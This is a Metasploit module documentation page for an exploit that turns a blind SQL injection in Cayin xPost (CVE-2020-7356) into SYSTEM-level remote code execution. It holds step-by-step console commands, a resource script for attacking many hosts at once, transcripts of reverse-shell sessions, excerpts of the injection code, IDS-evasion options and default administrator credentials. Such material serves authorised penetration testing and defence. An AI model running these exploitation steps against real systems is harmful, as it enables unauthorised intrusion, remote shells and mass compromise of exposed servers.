Cayin xPost wayfinder_seqid SQLi to RCE - Metasploit


This page contains detailed information about how to use the exploit/windows/http/cayin_xpost_sql_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cayin xPost wayfinder_seqid SQLi to RCE
Module: exploit/windows/http/cayin_xpost_sql_rce
Source code: modules/exploits/windows/http/cayin_xpost_sql_rce.rb
Disclosure date: 2020-06-04
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): java
Supported platform(s): Java, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2020-7356

This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. The wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can be injected with a blind SQLi. Since this app bundles MySQL and apache Tomcat the environment is pretty static and therefore the default settings should work. Results in SYSTEM level access. Only the java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads seem to be valid.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


Using cayin_xpost_sql_rce against a single host

Normally, you can use exploit/windows/http/cayin_xpost_sql_rce this way:

msf > use exploit/windows/http/cayin_xpost_sql_rce
msf exploit(cayin_xpost_sql_rce) > show targets
    ... a list of targets ...
msf exploit(cayin_xpost_sql_rce) > set TARGET target-id
msf exploit(cayin_xpost_sql_rce) > show options
    ... show and set options ...
msf exploit(cayin_xpost_sql_rce) > exploit

Using cayin_xpost_sql_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your cayin_xpost_sql_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/http/cayin_xpost_sql_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. The wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can be injected with a blind SQLi. Since this app bundles MySQL and Apache Tomcat the environment is pretty static and therefore the default settings should work. Results in SYSTEM level access. Only the java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads seem to be valid.

Default authentication for the system is administrator:admin from Guide page 16

Verification Steps


  1. Install the application and start it
  2. Start msfconsole
  3. Do: exploit/windows/http/cayin_xpost_sql_rce
  4. Do: set rhosts [ip]
  5. Do: run
  6. You should get a shell.

Options


LOCALWEBROOT

Path to the webapps folder for Cayin. Defaults to C:/CayinApps/webapps/

Scenarios


Cayin xPost 2.5 on Windows 10.0.16299.125

  [*] Processing xpost.rb for ERB directives.
  resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
  resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
  payload => java/jsp_shell_reverse_tcp
  resource (xpost.rb)> set rhosts 2.2.2.2
  rhosts => 2.2.2.2
  resource (xpost.rb)> set lhost 1.1.1.1
  lhost => 1.1.1.1
  resource (xpost.rb)> set verbose true
  verbose => true
  resource (xpost.rb)> exploit
  [*] Started reverse TCP handler on 1.1.1.1:4444 
  [*] Utilizing payload filename cY0bWf1Rh6C9.jsp
  [*] Payload Size: 1499
  [*] Payload Size Encoded: 2998
  [*] Attempting Exploitation
  [*] Triggering uploaded payload
  [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
  [!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result


  C:\CayinApps\Tomcat>
  C:\CayinApps\Tomcat>whoami
  whoami
  nt authority\system

  C:\CayinApps\Tomcat>ver
  ver

  Microsoft Windows [Version 10.0.16299.125]

  C:\CayinApps\Tomcat>

Go back to menu.

Msfconsole Usage


Here is how the windows/http/cayin_xpost_sql_rce exploit module looks in the msfconsole:

msf6 > use exploit/windows/http/cayin_xpost_sql_rce

[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(windows/http/cayin_xpost_sql_rce) > show info

       Name: Cayin xPost wayfinder_seqid SQLi to RCE
     Module: exploit/windows/http/cayin_xpost_sql_rce
   Platform: Java, Windows
       Arch: java
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-06-04

Provided by:
  h00die
  Gjoko Krstic (LiquidWorm) <[email protected]>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Automatic Target

Check supported:
  Yes

Basic options:
  Name          Current Setting        Required  Description
  ----          ---------------        --------  -----------
  LOCALWEBROOT  C:/CayinApps/webapps/  yes       Local install path webroot
  PAYLOADNAME                          no        Name of payload file to write
  Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT         80                     yes       The target port (TCP)
  SSL           false                  no        Negotiate SSL/TLS for outgoing connections
  TARGETURI     /                      yes       The URI of Cayin xPost
  VHOST                                no        HTTP server virtual host

Payload information:
  Space: 2000

Description:
  This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. 
  The wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can 
  be injected with a blind SQLi. Since this app bundles MySQL and 
  apache Tomcat the environment is pretty static and therefore the 
  default settings should work. Results in SYSTEM level access. Only 
  the java/jsp_shell_reverse_tcp and java/jsp_shell_bind_tcp payloads 
  seem to be valid.

References:
  https://www.exploit-db.com/exploits/48558
  https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
  https://nvd.nist.gov/vuln/detail/CVE-2020-7356

Module Options


This is a complete list of options available in the windows/http/cayin_xpost_sql_rce exploit:

msf6 exploit(windows/http/cayin_xpost_sql_rce) > show options

Module options (exploit/windows/http/cayin_xpost_sql_rce):

   Name          Current Setting        Required  Description
   ----          ---------------        --------  -----------
   LOCALWEBROOT  C:/CayinApps/webapps/  yes       Local install path webroot
   PAYLOADNAME                          no        Name of payload file to write
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80                     yes       The target port (TCP)
   SSL           false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                      yes       The URI of Cayin xPost
   VHOST                                no        HTTP server virtual host

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

Advanced Options


Here is a complete list of advanced options supported by the windows/http/cayin_xpost_sql_rce exploit:

msf6 exploit(windows/http/cayin_xpost_sql_rce) > show advanced

Module advanced options (exploit/windows/http/cayin_xpost_sql_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (java/jsp_shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/http/cayin_xpost_sql_rce module can exploit:

msf6 exploit(windows/http/cayin_xpost_sql_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Target

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/http/cayin_xpost_sql_rce exploit:

msf6 exploit(windows/http/cayin_xpost_sql_rce) > show payloads

Compatible Payloads
===================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  payload/generic/custom                                    normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4  payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   6  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the windows/http/cayin_xpost_sql_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/http/cayin_xpost_sql_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not connect to the web service, check URI Path and IP


Here is a relevant code snippet related to the "Could not connect to the web service, check URI Path and IP" error message:

71:	    res = send_request_cgi(
72:	      'uri' => normalize_uri(target_uri.path, 'cayin', 'js', 'English', 'language.js')
73:	    )
74:	
75:	    if res.nil? || res.code != 200
76:	      return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
77:	    end
78:	
79:	    %r{// xPost v(?<version>[\d.]+) } =~ res.body
80:	
81:	    if version && Rex::Version.new(version) <= Rex::Version.new('2.5')

Could not connect to the web service, check URI Path and IP


Here is a relevant code snippet related to the "Could not connect to the web service, check URI Path and IP" error message:

87:	    res = send_request_cgi(
88:	      'uri' => normalize_uri(target_uri.path, 'cayin', 'index.jsp')
89:	    )
90:	
91:	    if res.nil? || res.code != 200
92:	      return CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
93:	
94:	    end
95:	
96:	    if res.body =~ %r{<title>xPost</title>}
97:	      vprint_good('HTML Title includes xPost')

Could not connect to the web service, check URI Path and IP


Here is a relevant code snippet related to the "Could not connect to the web service, check URI Path and IP" error message:

97:	      vprint_good('HTML Title includes xPost')
98:	      return CheckCode::Detected
99:	    end
100:	    CheckCode::Safe
101:	  rescue ::Rex::ConnectionError
102:	    CheckCode::Safe('Could not connect to the web service, check URI Path and IP')
103:	  end
104:	
105:	  def exploit
106:	    filename = datastore['PAYLOADNAME'].blank? ? "#{rand_text_alphanumeric(6..12)}.jsp" : datastore['PAYLOADNAME']
107:	    filename = "#{filename}.jsp" unless filename.end_with? '.jsp'

<PEER> - Could not connect to web service - no response


Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:

121:	    # use raw to prevent encoding of injection characters
122:	    res = send_request_raw(
123:	      'uri' => "#{uri}?wayfinder_seqid=#{payload_request}"
124:	    )
125:	
126:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
127:	
128:	    if res.code == 400
129:	      fail_with(Failure::UnexpectedReply, "#{peer} - Payload too large, utilize a smaller payload")
130:	    end
131:	

<PEER> - Payload too large, utilize a smaller payload


Here is a relevant code snippet related to the "<PEER> - Payload too large, utilize a smaller payload" error message:

124:	    )
125:	
126:	    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
127:	
128:	    if res.code == 400
129:	      fail_with(Failure::UnexpectedReply, "#{peer} - Payload too large, utilize a smaller payload")
130:	    end
131:	
132:	    if res.code != 302
133:	      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response to injection")
134:	    end

<PEER> - Invalid response to injection


Here is a relevant code snippet related to the "<PEER> - Invalid response to injection" error message:

128:	    if res.code == 400
129:	      fail_with(Failure::UnexpectedReply, "#{peer} - Payload too large, utilize a smaller payload")
130:	    end
131:	
132:	    if res.code != 302
133:	      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response to injection")
134:	    end
135:	
136:	    register_file_for_cleanup("#{datastore['LOCALWEBROOT']}#{filename}")
137:	
138:	    vprint_status('Triggering uploaded payload')

<PEER> - Could not connect to the web service


Here is a relevant code snippet related to the "<PEER> - Could not connect to the web service" error message:

135:	
136:	    register_file_for_cleanup("#{datastore['LOCALWEBROOT']}#{filename}")
137:	
138:	    vprint_status('Triggering uploaded payload')
139:	    send_request_cgi(
140:	      'uri' => normalize_uri(target_uri.path, filename)
141:	    )
142:	  rescue ::Rex::ConnectionError
143:	    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
144:	  end
145:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.